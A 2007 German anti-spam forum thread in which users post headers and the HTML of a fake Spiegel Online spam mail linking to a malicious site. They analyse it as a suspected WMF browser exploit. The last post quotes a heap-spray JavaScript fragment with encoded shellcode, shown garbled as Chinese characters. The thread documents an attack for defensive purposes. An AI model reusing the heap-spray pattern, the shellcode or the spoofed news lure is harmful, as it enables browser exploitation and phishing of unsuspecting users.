Ergebnis 1 bis 6 von 6

Thema: SpiegelOnline Fake Spam

  1. #1
    Neues Mitglied
    Registriert seit
    01.09.2006
    Beiträge
    10

    Standard SpiegelOnline Fake Spam

    Bei der Rechtschreibung war ich mir allerdings nicht sicher, ob man das als deutschsprachigen Spam deklarieren kann *g*


    header:
    01: Microsoft Mail Internet Headers Version 2.0
    02: Received: from ip-83-2-97-100.static.xcore.pl (ip-83-2-97-100.static.xcore.pl
    03: [83.2.97.100]) by babelfish.intra.medianetworx.de (GMS
    04: 12.01.3461/KX0677.00.11dc1039) with SMTP ID: [ID filtered]
    05: [deleted]; Wed, 31 Jan 2007 xx:xx:xx +0100
    06: Message-ID: [ID filtered]
    07: Date: Wed, 31 Jan 2007 xx:xx:xx +0100
    08: From: www.spiegel.de <Rosanne [at] nipron.com>
    09: User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
    10: X-Accept-Language: en-us, en
    11: MIME-Version: 1.0
    12: To: [deleted]
    13: Subject: Schummi wiederkehrt! (spiegelonline.de)
    14: Content-Type: multipart/alternative;
    15: boundary="------------010000060102090900080702"
    16: X-Antivirus: avast! (VPS 000709-0, 2007-01-30), Outbound message
    17: X-Antivirus-Status: Clean
    18: X-AntiSpam: Checked for restricted content by Gordano's AntiSpam Software
    19: Return-Path: Rosanne [at] nipron.com
    20: X-OriginalArrivalTime: 31 Jan 2007 xx:xx:xx.0074 (UTC)
    21: FILETIME=[592B01A0:01C7451C]
    22: --------------010000060102090900080702
    23: Content-Type: text/plain; charset=iso-8859-1; format=flowed
    24: Content-Transfer-Encoding: 8bit
    25: --------------010000060102090900080702
    26: Content-Type: text/html; charset=iso-8859-1
    27: Content-Transfer-Encoding: 8bit
    28: --------------010000060102090900080702--

    [HTML]
    <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>

    <title>Schummi wiederkehrt! (spiegelonline.de)</title>
    </head>
    <body bgcolor="#ffffff" text="#000000">
    <style type="text/css">
    a {
    color: rgb(0, 77, 207);
    text-decoration: none;
    }
    a:hover {
    color: rgb(0, 64, 128);
    text-decoration: underline;
    }
    </style>
    </head>
    <body style="margin: 0; padding: 0">
    <table width="50%" style="margin: 0; padding: 0">
    <tr><td style="background-color: #F30B3C"><img src="http://soulrelax.net/1.gif"></td></tr>
    <tr><td style="height: 10px"></td></tr>
    <tr><td style="height: 15px; background-color: #F30B3C; padding: 7px; font-family: arial,Helvetica,sans-serif; font-size: 13px; font-weight: bold; color: rgb(255, 255, 255);">Lesen Sie das Internet Auslegung</td></tr>
    <tr><td style="background-color: #EDEEEF; padding: 7px; font-family: arial,Helvetica,sans-serif; font-size: 14px" width="100%">
    <div style="width: 50%; margin: 10 10 25 10">
    Deutsche Bundesbank,Finanzchef,Finanzseite,Citibank
    Nicht gekommen, um zu bleiben…*<a href="http://authorizationuser.com/spl/">[mehr...]</a>

    </div>
    <div style="width: 50%; margin: 10 10 25 10">
    Schummi wiederkehrt !!!*<a href="http://authorizationuser.com/spl/">[mehr...]</a>
    </div>
    <div style="width: 50%; margin: 10 10 25 10">
    Saadam Husein ist lebendig!? Interview mit Kondoliza Rais...…*<a href="http://authorizationuser.com/spl/">[mehr...]</a>
    </div>
    </td></tr>
    <tr><td style="height: 10px; background-color: #F30B3C; padding-left: 7px; font-family: arial,Helvetica,sans-serif; font-size: 10px; font-weight: bold; color: rgb(255, 255, 255);">© 2007 Spigel Online</td></tr>
    </table>
    </body>
    </html>
    [/HTML]
    Geändert von Investi (31.01.2007 um 11:24 Uhr) Grund: Verschoben. Wenn man es schon als Fake-Spam kennzeichnet, dann kann man es auch gleich ins richtige Unterforum setzen.

  2. #2
    Mitglied Avatar von Johannes
    Registriert seit
    08.01.2007
    Beiträge
    354

    Standard

    Zitat Zitat von pixel Beitrag anzeigen
    Bei der Rechtschreibung war ich mir allerdings nicht sicher, ob man das als deutschsprachigen Spam deklarieren kann *g*
    Ging mir auch so ;-)


    Ich bekam den Schrott innerhalb kürzester Zeit auf drei unterchiedliche eMail-Adressen, die Absender IP's waren

    whois:212.227.126.183 und whois:212.227.15.40 sowie whois:81.169.145.151

    Beispiel für einen der Header


    header:
    01: -------- Original-Nachricht --------
    02: From: - Wed Jan 31 xx:xx:xx 2007
    03: X-Account-Key: account3
    04: X-UIDL: [UID filtered]
    05: X-Mozilla-Status: 1001
    06: X-Mozilla-Status2: 00000000
    07: X-Envelope-From: <Claude [at] iwon.com>
    08: X-Envelope-To: <poor [at] spamvictim.tld>
    09: X-Delivery-Time: 1170244465
    10: Received: from natzeb.rzone.de (natlb3-8.rzone.de [81.169.145.151]) by
    11: mailin.webmailer.de (8.13.7/8.13.7) with ESMTP ID: [ID filtered]
    12: Received: (from root [at] localhost) by post.webmailer.de (8.13.7/8.13.7) ID: [ID filtered]
    13: Received: from 63.36.209.58.broad.sz.js.dynamic.163data.com.cn
    14: (63.36.209.58.broad.sz.js.dynamic.163data.com.cn [58.209.36.63] (may be forged)) by
    15: mailin.webmailer.de (8.13.7/8.13.7) with SMTP ID: [ID filtered]
    16: Message-ID: [ID filtered]
    17: Date: Wed, 31 Jan 2007 xx:xx:xx +0800
    18: From: www.spiegel.de <Claude [at] iwon.com>
    19: User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
    20: X-Accept-Language: en-us, en
    21: MIME-Version: 1.0
    22: To: poor [at] spamvictim.tld
    23: Subject: Schummi wiederkehrt! (spiegelonline.de)
    24: Content-Type: multipart/alternative;
    25: boundary="------------050308070301080308050302"

    Die links in dem dämlichen Text führen zu whois:http://authorizationuser.com/spl/ *lol
    Geändert von Johannes (31.01.2007 um 13:45 Uhr)

  3. #3
    Pöhser Purche Avatar von homer
    Registriert seit
    18.07.2005
    Ort
    Oberfranken
    Beiträge
    2.891

    Standard

    Ist grade auch hier eingeschlagen:

    header:
    01: Return-Path: <Stan [at] nitco.com>
    02: Received: from unknown (HELO admin-43z4r3kdj.ethome.net.tw) (218.35.224.13)
    03: by 0 with SMTP; 31 Jan 2007 xx:xx:xx -0000
    04: Received-SPF: none (0: domain at nitco.com does not designate permitted
    05: sender hosts)
    06: Message-ID: [ID filtered]
    07: Date: Wed, 31 Jan 2007 20:XX:XX +0800
    08: From: www.spiegel.de <Stan [at] nitco.com>
    09: User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
    10: X-Accept-Language: en-us, en
    11: MIME-Version: 1.0
    12: To: me [at] work
    13: Subject: Schummi wiederkehrt! (spiegelonline.de)

    Die Seite whois:http://authorizationuser.com/spl/ scheint ein kleines Problem zu haben und den Content nicht volsltändig auszuliefern:
    Warning: fopen(ip_all.txt): failed to open stream: Permission denied in /home/chua/public_html/spl/settings.php on line 26

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/chua/public_html/spl/settings.php on line 27

    Warning: fclose(): supplied argument is not a valid stream resource in /home/chua/public_html/spl/settings.php on line 28

    Warning: fopen(ip_firefox.txt): failed to open stream: Permission denied in /home/chua/public_html/spl/settings.php on line 26

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/chua/public_html/spl/settings.php on line 27

    Warning: fclose(): supplied argument is not a valid stream resource in /home/chua/public_html/spl/settings.php on line 28
    Auf jeden Fall wird eine Browser/IP-Statistik erstellt. Ausserdem ist da neben einem gar kryptischen Stück JavaScript auch ein seltsamer Verweis auf ein eingebettetes .wmf-File.

    BTW: Kann es sein, dass der JavaScript-Decoder nicht mit UTF-codiertem JS zurecht kommt?

    Ich hätte lieber 100 Nazis als Kunden, als einen Asylanten. - Klaus, 55, Bestatter

  4. #4
    Mitglied Avatar von Johannes
    Registriert seit
    08.01.2007
    Beiträge
    354

    Standard

    Zitat Zitat von homer Beitrag anzeigen
    Received: from unknown (HELO admin-43z4r3kdj.ethome.net.tw) (218.35.224.13)
    Na, wenigstens gehen die IP-Nummern jetzt mal weg aus D und in Richtung Asien :-)

  5. #5
    Senior Mitglied
    Registriert seit
    18.07.2005
    Ort
    Raxacoricofallapatorius
    Beiträge
    1.200

    Standard

    Bei mir auch eingetroffen:

    header:
    01: Return-Path: <x>
    02: Delivery-Date: Wed, 31 Jan 2007 xx:xx:xx +0100
    03: Received: from good2go-bdc323e.vs.shawcable.net (70.71.171.207 [70.71.171.207])
    04: by dm09.mta.everyone.net (EON-INBOUND) with SMTP ID: [ID filtered]
    05: for <x>; Wed, 31 Jan 2007 xx:xx:xx -0800
    06: Message-ID: [ID filtered]
    07: Date: Wed, 31 Jan 2007 xx:xx:xx -0800
    08: From: www.spiegel.de <x>
    09: User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
    10: X-Accept-Language: en-us, en
    11: MIME-Version: 1.0
    12: To: x
    13: Subject: Schummi wiederkehrt! (spiegelonline.de)
    14: Content-Type: multipart/alternative;
    15: boundary="------------020308020409070606070800"

    Zitat Zitat von homer Beitrag anzeigen
    Ausserdem ist da neben einem gar kryptischen Stück JavaScript auch ein seltsamer Verweis auf ein eingebettetes .wmf-File.
    Kann es sein, dass damit versucht wird, einen (ungepatchten) WMF-Exploid aszunutzen?
    Geändert von Spamgegner (31.01.2007 um 22:47 Uhr)
    nix

  6. #6
    Senior Mitglied Avatar von Sirius
    Registriert seit
    20.07.2005
    Ort
    Im Ausland
    Beiträge
    4.274

    Standard

    Ich habe den Mist auch bekommen. Die Mail kommt aus China: 61.163.216.141.

    header:
    01: X-Apparently-To: ***@*** via 217.146.177.230; Wed, 31 Jan 2007 xx:xx:xx -0800
    02: X-YahooFilteredBulk: 61.163.216.141
    03: X-Originating-IP: [61.163.216.141]
    04: Authentication-Results: mta295.mail.re4.yahoo.com from=; domainkeys=neutral (no sig)
    05: Received: from 61.163.216.141 (HELO hn.ly.kd.adsl) (61.163.216.141)
    06: by mta295.mail.re4.yahoo.com with SMTP; Wed, 31 Jan 2007 xx:xx:xx -0800
    07: Date: Thu, 1 Feb 2007 xx:xx:xx +0800
    08: From: www.spiegel.de <Dee [at] yrnet.com>
    09: User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050716)
    10: X-Accept-Language: en-us, en
    11: MIME-Version: 1.0
    12: To: ***@***
    13: Subject: Schummi wiederkehrt! (spiegelonline.de)
    Ich vermute, dass ein Hacker dahinter steckt, der sich Chua nennt: /home/chua/public_html/spl/...
    Zitat Zitat von homer
    BTW: Kann es sein, dass der JavaScript-Decoder nicht mit UTF-codiertem JS zurecht kommt?
    Mit den richtigen Einstellungen geht es.

    Der JavaScript-Code soll einen Speicherüberlauf auslösen:
    Code:
    var s = unescape("%u4141䅁䅁䅁䅁.........");
    do {
        s += s;
    } while (s.length < 0x0900000);
    
    s += unescape("哫 ....");
    Der Unicode besteht aus chinesischen Schriftzeichen
    哫疋謼㕴͸囵皋̠㏵䧉굁ᒾ㠨瓲섈෋㯯痟廧庋̤曝ಋ譋ᱞҋ΋쏅牵浬湯搮汬䌀尺⹕硥e쀳ͤ぀౸䂋謌ᱰ训ࡀ৫䂋贴籀䂋锼躿๎ト�茄␬\闐뽐ᨶ瀯濨�诿⑔跼멒匤 탿뽝

    Übersetzung:
    Zitat Zitat von Babel Fish
    , U.S. bolt 謼 㕴 ͸ George Gao ̠ ㏵ 䧉 굁 ᒾ 㠨 瓲 섈 ෋ 㯯 introducing 廧 foreword ̤ exposed ಋ 譋 ᱞ ҋ ΋ 쏅 led miles soup determine 汬 䌀 foot ⹕ 硥 e 쀳 ͤ ぀ ౸ 䂋 Ge Shi ᱰ training ࡀ ৫ 䂋 posted LIMITED 䂋 Rees 躿 ๎  ト �  finish ␬ \ rumbling sound 뽐 ᨶ 瀯 濨 � blamed ⑔ 跼 멒  匤 탿 뽝

    Zitat Zitat von Spamgegner
    Kann es sein, dass damit versucht wird, einen (ungepatchten) WMF-Exploid aszunutzen?
    Das ist gut möglich. Aber erstens ist besagte Datei nicht vorhanden und zweitens wäre es eine WMV-Datei (Sprachfehler des Hackers?).
    WMV ist eine reine Windows-Datei. Vielleicht soll mit dem langen URL der IE zum Absturz gebracht werden.
    Irren ist menschlich - aber für richtig dumme Sachen braucht man einen Computer.

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen